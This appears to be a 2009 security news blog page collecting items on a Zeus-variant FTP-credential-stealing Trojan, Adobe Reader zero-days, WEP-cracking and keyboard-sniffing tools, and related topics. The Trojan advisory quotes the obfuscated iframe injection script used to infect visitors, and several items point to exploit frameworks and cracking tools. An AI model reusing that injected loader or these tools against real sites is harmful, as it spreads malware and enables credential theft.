Wireless hack,Wifi hack & security

On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.
What is severity of this infection ?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.

What is the infection Vector ?
The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised WebPages contain an injected script that looks something like the example below:
“fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);var fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);”

What does the malware do ?

Once installed the malware, which is a variant of the Zeus family, scours the machines stored form cache looking for stored FTP login credentials, then once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME:PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.

Even after his Death , they dont leave his name alone and being constanly used to bring in lime light from sneaky people, this time by malaware kiddies, try not to lure in to his death information what the truth might be seen in news channels.

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.
more

Durzosploit is a javascript exploits generator framework that works through the console. This goal of that project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites.

Durzosploit does not find browser vulnerabilities, it only is an framework containing exploits you can use.

further details can be found here

http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

A hacker calling himself Arr1val has published proof-of-concept exploit codes for two 0-day vulnerabilities affecting Adobe Reader and Acrobat. The company has already confirmed one of them and strongly suggests disabling JavaScript in the products until a patch will be made available.

The flaws are classified by SecurityFocus as “boundary condition errors.” The first is located in thegetAnnots() JavaScript function and the other in spell.customDictionaryOpen(). Both of them make it possible for an attacker to execute arbitrary code on systems with the affected products installed, by tricking users into opening a maliciously crafted PDF file.

According to Arr1val’s PoC exploits, published on Packet Storm during the early hours of Tuesday, the vulnerabilities were tested on Adobe Reader 9.1 and Adobe 8.1.4 running on Linux. Adobe acknowledged the report and started an investigation into the issues. “We are currently investigating, and will have an update once we get more information,” David Lenoe initiallyannounced on the blog of Adobe’s Product Security Incident Response Team (PSIRT). More

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final (codename “pwnsauce“). A VMWare Image of BT4 will be released in a few days.  We have major changes in BackTrack, and have tried to document and summarize them as best as possible.

read the full story here

http://www.offensive-security.com/blog/backtrack/backtrack-pre-final-public-release-and-download/

Optical Desktop 1000 and 2000 wireless keyboard users should consider replacing them with a wired keyboard as it has now become a practical possibility for attackers to sniff out their keystrokes. About one and a half years after announcing that they cracked Microsoft’s wireless keyboard encryption, Max Moser and Thorsten Schröder of Dreamlab have published the required Keykeriki software as well as instructions for building the sniffing hardware (circuit diagram and board layout in Eagle format).
The hardware is based around the Texas Instruments TRF7900A 27 MHz receiver used in wireless mice and keyboards. It’s controlled via an 8-bit Atmel controller. Dreamlab is even considering selling readily assembled hardware units.
In a 49 page Presentation , Moser and Schröder explain the hardware and software details behind the hack. Two Flash videos on the project page show the software and hardware in action.
Only Microsoft wireless keyboards transmitting on the 27 MHz band are currently affected. Bluetooth keyboards are not at risk. Decoding Microsoft keyboards is extremely easy because the encryption is based on a simple XOR operation and only requires an 8-bit key. Although the method of cracking these keyboards has been known since December 2007, Moser and Schröder have so far found nothing to indicate that Microsoft has taken steps to resolve the situation.
The researchers will target 2.4 GHz keyboards next. Even switching to a wired keyboard, however, doesn’t seem to be the ultimate solution. Researchers at the CanSecWest security conference have already demonstrated how to tap wired keyboards by taking laser measurements and monitoring power line leakage.

A bug in patch 1 for McAfee VirusScan Enterprise v8.7i caused serious problems according to several user reports. On updated PCs, the scanner “discovered” a worm (W32/Generic.worm.aa) in several Windows XP and Vista system files and deleted or moved them. The result was that the PCs hung up or booted repeatedly when restarted.
In order to avoid further damage, McAfee initially removed the patch from its service portal and download pages. Users who had already installed patch 1 in their environments, but haven’t noticed any problem yet are being advised by McAfee not to uninstall it. The DAT files that McAfee has been distributing since the 7th of June are promised to prevent the false alarm and so eliminate the problems.
Customers that have already encountered problems are advised to contact McAfee support. McAfee says the error only affected a small number of business clients, but several disgruntled administrators are discussing the subject in the McAfee forums.
The number of false alarms from virus scanners has strongly increased in the recent past. In February, Bitdefender and G DATA crippled many Windows systems by incorrectly identifying Winlogon.exe as a trojan and deleting it. Bitdefender and G Data, however, are not the only programs now finding false positives.

WEPBuster basically seems to be a toolkit that attempts to automate the tasks done by the various parts of the aircrack-ng suite.

The end goal of course is to crack the WEP key of a given Wireless network.

Features

The main part of this is the autonomous nature of the toolkit, it can crack all access points within the range in one go. Other than the the features would be those found in aircrack-ng.

• Mac address filtering bypass (via mac spoofing)
• Auto reveal hidden SSID
• Client-less Access Point injection
• Shared Key Authentication
• WEP Decloaking (future version)
• Whitelists (crack only APs included in the list)
• Blacklists (do not crack APs included in the list)

You can download WEPBuster here:WEPbuster.tgz

*Malicious PDF: Get owned without opening
*Review: IronKey Personal
*Windows 7 security features: Building on Vista
*Using Wireshark to capture and analyze wireless traffic
*”Unclonable” RFID - a technical overview
*Secure development principles
*Q&A: Ron Gula on Nessus and Tenable Network Security
*Establish your social media presence with security in mind
*A historical perspective on the cybersecurity dilemma
*A risk-based, cost effective approach to holistic security
*AND MORE! download it here

Security analyst Raul Siles has developed a paper on the use of wireless honeypot (dubbed “honeyspot”) technology to study the skills and capabilities of wireless attackers. Describing the architecture and deployment of a wireless honeypot, Siles’ paper is a valuable resource for enhancing the security of wireless networks, either as an attacker skillset and technique analysis tool, or as a deterrent to ward attackers away from other networks (e.g. “Pay no attention to the man behind the curtain”). More information is available on Raul’s blog post or you can grab the paper from the Spanish Honeypot website.
Thanks Rahul..